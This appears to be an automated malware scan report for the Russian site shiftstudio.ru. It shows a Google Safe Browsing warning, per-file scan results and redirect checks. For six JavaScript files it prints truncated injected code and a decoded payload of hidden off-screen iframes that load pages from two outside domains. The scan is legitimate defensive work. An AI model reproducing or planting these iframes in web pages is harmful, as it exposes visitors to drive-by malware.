Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shiftstudio.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.shiftstudio.ru/ | 200 OK Content-Length: 17775 Content-Type: text/html | clean |
http://www.shiftstudio.ru/templates/shift_templates/js/jquery-1.7.min.js | 200 OK Content-Length: 105721 Content-Type: application/x-javascript | clean |
http://www.shiftstudio.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 108215 Content-Type: application/x-javascript | clean |
http://www.shiftstudio.ru/media/system/js/core.js | 200 OK Content-Length: 16637 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var opined = 0; if ((opined = haystack.indexOf(needle, f_offset)) !== -1) { return opined; } return false; } function getbrowser(){ var checkbrowser = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','Sl ...[8498 bytes skipped]... Decoded script: <iframe name="Pizzarea" src="http://kendy.android-tech3.com/ardgewtewgrsehtrj19.html" style="position:absolute;left:-1290px;top:-1290px;" height="139" width="139"></iframe><iframe src=http://pededro.grupocalafia.org.mx/jtky6e5jerh.php?hystory style="position:absolute;left:-1350px;top:-1398px;" height="122" width="135"></iframe> | ||
http://www.shiftstudio.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 250184 Content-Type: application/x-javascript | clean |
http://www.shiftstudio.ru/media/system/js/modal.js | 200 OK Content-Length: 21585 Content-Type: application/x-javascript | clean |
http://www.shiftstudio.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 18673 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var opined = 0; if ((opined = haystack.indexOf(needle, f_offset)) !== -1) { return opined; } return false; } function getbrowser(){ var checkbrowser = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','Sl ...[10856 bytes skipped]... Decoded script: <iframe name="Pizzarea" src="http://kendy.android-tech3.com/ardgewtewgrsehtrj19.html" style="position:absolute;left:-1290px;top:-1290px;" height="139" width="139"></iframe><iframe src=http://pededro.grupocalafia.org.mx/jtky6e5jerh.php?hystory style="position:absolute;left:-1350px;top:-1398px;" height="122" width="135"></iframe> | ||
http://www.shiftstudio.ru/plugins/system/iewarning/js/warning.js | 200 OK Content-Length: 19878 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var opined = 0; if ((opined = haystack.indexOf(needle, f_offset)) !== -1) { return opined; } return false; } function getbrowser(){ var checkbrowser = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','Sl ...[11615 bytes skipped]... Decoded script: <iframe name="Pizzarea" src="http://kendy.android-tech3.com/ardgewtewgrsehtrj19.html" style="position:absolute;left:-1290px;top:-1290px;" height="139" width="139"></iframe><iframe src=http://pededro.grupocalafia.org.mx/jtky6e5jerh.php?hystory style="position:absolute;left:-1350px;top:-1398px;" height="122" width="135"></iframe> | ||
http://www.shiftstudio.ru/templates/shift_templates/js/jquery.jcarousel.min.js | 200 OK Content-Length: 44448 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var opined = 0; if ((opined = haystack.indexOf(needle, f_offset)) !== -1) { return opined; } return false; } function getbrowser(){ var checkbrowser = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','Sl ...[33229 bytes skipped]... Decoded script: <iframe name="Pizzarea" src="http://kendy.android-tech3.com/ardgewtewgrsehtrj19.html" style="position:absolute;left:-1290px;top:-1290px;" height="139" width="139"></iframe><iframe src=http://pededro.grupocalafia.org.mx/jtky6e5jerh.php?hystory style="position:absolute;left:-1350px;top:-1398px;" height="122" width="135"></iframe> | ||
http://web.redhelper.ru/service/main.js?c=shiftstudio | 200 OK Content-Length: 1577 Content-Type: application/x-javascript | clean |
http://www.shiftstudio.ru/company | 200 OK Content-Length: 13399 Content-Type: text/html | clean |
http://www.shiftstudio.ru/uslugi | 200 OK Content-Length: 15380 Content-Type: text/html | clean |
http://www.shiftstudio.ru/portfolio | 200 OK Content-Length: 46961 Content-Type: text/html | clean |
http://www.shiftstudio.ru/kontakty | 200 OK Content-Length: 16436 Content-Type: text/html | clean |
http://www.shiftstudio.ru/media/system/js/validate.js | 200 OK Content-Length: 14776 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var opined = 0; if ((opined = haystack.indexOf(needle, f_offset)) !== -1) { return opined; } return false; } function getbrowser(){ var checkbrowser = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','Sl ...[6548 bytes skipped]... Decoded script: <iframe name="Pizzarea" src="http://kendy.android-tech3.com/ardgewtewgrsehtrj19.html" style="position:absolute;left:-1290px;top:-1290px;" height="139" width="139"></iframe><iframe src=http://pededro.grupocalafia.org.mx/jtky6e5jerh.php?hystory style="position:absolute;left:-1350px;top:-1398px;" height="122" width="135"></iframe> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shiftstudio.ru
Result:
GET / HTTP/1.1
Host: shiftstudio.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: shiftstudio.ru
Referer: http://www.google.com/search?q=shiftstudio.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shiftstudio.ru
Referer: http://www.google.com/search?q=shiftstudio.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.